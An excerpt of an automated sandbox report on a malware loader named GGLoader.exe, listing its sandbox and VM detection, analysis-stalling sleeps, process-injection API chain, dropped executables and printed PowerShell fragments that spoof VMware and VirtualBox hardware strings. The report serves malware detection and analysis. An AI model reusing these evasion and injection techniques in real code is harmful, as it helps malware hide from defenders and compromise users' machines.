                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Contains functionality to compare user and computer (likely to detect sandboxes)
                        Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,42_2_00000001400010C0
                        Found stalling execution ending in API Sleep call
                        Source: C:\Windows\System32\dllhost.exeStalling execution: Execution stalls by calling Sleep
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: GGLoader.exeBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\GGLoader.exeMemory allocated: 1810000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeMemory allocated: 1B4D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5689Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4077Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3399Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3192Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6279Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3473Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7014
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2652
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeWindow / User API: threadDelayed 1055
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4348
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 815
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5850
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1481
                        Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 881
                        Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 574
                        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4509
                        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5490
                        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 8996
                        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 946
                        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 4355
                        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9875
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\LicenseGet.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\poduiwcd.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-24265
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_35-23675
                        Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                        Source: C:\Windows\System32\conhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_39-13982
                        Source: C:\Windows\System32\dialer.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_37-203
                        Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                        Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\System32\conhost.exeAPI coverage: 6.0 %
                        Source: C:\Windows\System32\conhost.exeAPI coverage: 6.0 %
                        Source: C:\Users\user\Desktop\GGLoader.exe TID: 7484Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 3399 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 3192 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep count: 6279 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep count: 3473 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe TID: 7912Thread sleep count: 1055 > 30
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe TID: 7912Thread sleep time: -52750s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6032Thread sleep count: 4348 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2648Thread sleep count: 815 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3736Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6308Thread sleep count: 5850 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep count: 1481 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\dllhost.exe TID: 8148Thread sleep count: 881 > 30
                        Source: C:\Windows\System32\dllhost.exe TID: 8148Thread sleep time: -88100s >= -30000s
                        Source: C:\Windows\System32\dllhost.exe TID: 8184Thread sleep count: 574 > 30
                        Source: C:\Windows\System32\dllhost.exe TID: 8184Thread sleep time: -57400s >= -30000s
                        Source: C:\Windows\System32\winlogon.exe TID: 8Thread sleep count: 4509 > 30
                        Source: C:\Windows\System32\winlogon.exe TID: 8Thread sleep time: -4509000s >= -30000s
                        Source: C:\Windows\System32\winlogon.exe TID: 8Thread sleep count: 5490 > 30
                        Source: C:\Windows\System32\winlogon.exe TID: 8Thread sleep time: -5490000s >= -30000s
                        Source: C:\Windows\System32\lsass.exe TID: 5016Thread sleep count: 8996 > 30
                        Source: C:\Windows\System32\lsass.exe TID: 5016Thread sleep time: -8996000s >= -30000s
                        Source: C:\Windows\System32\lsass.exe TID: 5016Thread sleep count: 946 > 30
                        Source: C:\Windows\System32\lsass.exe TID: 5016Thread sleep time: -946000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 8080Thread sleep count: 4355 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 8080Thread sleep time: -4355000s >= -30000s
                        Source: C:\Windows\System32\dwm.exe TID: 5052Thread sleep count: 9875 > 30
                        Source: C:\Windows\System32\dwm.exe TID: 5052Thread sleep time: -9875000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7476Thread sleep count: 146 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7476Thread sleep time: -146000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7540Thread sleep count: 141 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7540Thread sleep time: -141000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7512Thread sleep count: 141 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7512Thread sleep time: -141000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7532Thread sleep count: 135 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7532Thread sleep time: -135000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7484Thread sleep count: 63 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7484Thread sleep time: -63000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7496Thread sleep count: 116 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7496Thread sleep time: -116000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7640Thread sleep count: 90 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7640Thread sleep time: -90000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 1216Thread sleep count: 80 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 1216Thread sleep time: -80000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2892Thread sleep count: 84 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 2892Thread sleep time: -84000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5080Thread sleep count: 84 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5080Thread sleep time: -84000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep count: 81 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep time: -81000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                        Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00C0A1F1 FindFirstFileExW,FindNextFileW,FindClose,FindClose,35_2_00C0A1F1
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E59BE3C FindFirstFileExW,39_2_000002505E59BE3C
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1BBE3C FindFirstFileExW,41_2_000001C08C1BBE3C
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_000002131118BE3C FindFirstFileExW,42_2_000002131118BE3C
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC64BE3C FindFirstFileExW,43_2_00000225DC64BE3C
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00793B60 GetSystemInfo,GlobalMemoryStatusEx,CreateFileA,DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,6_2_00793B60
                        Source: C:\Users\user\Desktop\GGLoader.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: powershell.exe, 00000001.00000002.1967211454.000001EC48F35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAE'
                        Source: svcupdater.exe, 00000023.00000002.2994296261.000000000116A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                        Source: svchost.exe, 00000033.00000002.2990825628.000001845BC0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                        Source: svcupdater.exe, 00000023.00000002.2994296261.000000000113B000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.000000000116A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000003.00000002.1767788945.000002511E4B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;j
                        Source: GGLoader.exe, 00000000.00000002.1714327459.000000000152B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: svchost.exe, 00000035.00000003.2350422690.000001D559C7F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                        Source: svchost.exe, 00000035.00000003.2355871811.000001D559386000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                        Source: GGLoader.exeBinary or memory string: CheckForVMwareAndVirtualBox
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                        Source: svchost.exe, 0000002D.00000002.2957315131.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                        Source: svchost.exe, 00000035.00000002.3000604673.000001D559E88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                        Source: GGLoader.exeBinary or memory string: vmware
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
                        Source: powershell.exe, 00000003.00000002.1767742399.000002511CE80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;W6432=C:\Progr@L]
                        Source: svchost.exe, 00000035.00000002.2964974668.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000000.2294791024.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                        Source: powershell.exe, 00000003.00000002.1767408817.000002511CAF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1767408817.000002511CAE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1790991366.0000025136E12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1789784483.0000025136BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;
                        Source: svchost.exe, 00000035.00000003.2355871811.000001D559386000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                        Source: svchost.exe, 00000035.00000000.2296597019.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
                        Source: svchost.exe, 00000035.00000000.2296026118.000001D559020000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: svchost.exe, 00000035.00000003.2349769567.000001D5599A5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                        Source: GGLoader.exe, 00000000.00000002.1714327459.000000000152B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}2igv
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                        Source: GGLoader.exeBinary or memory string: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherT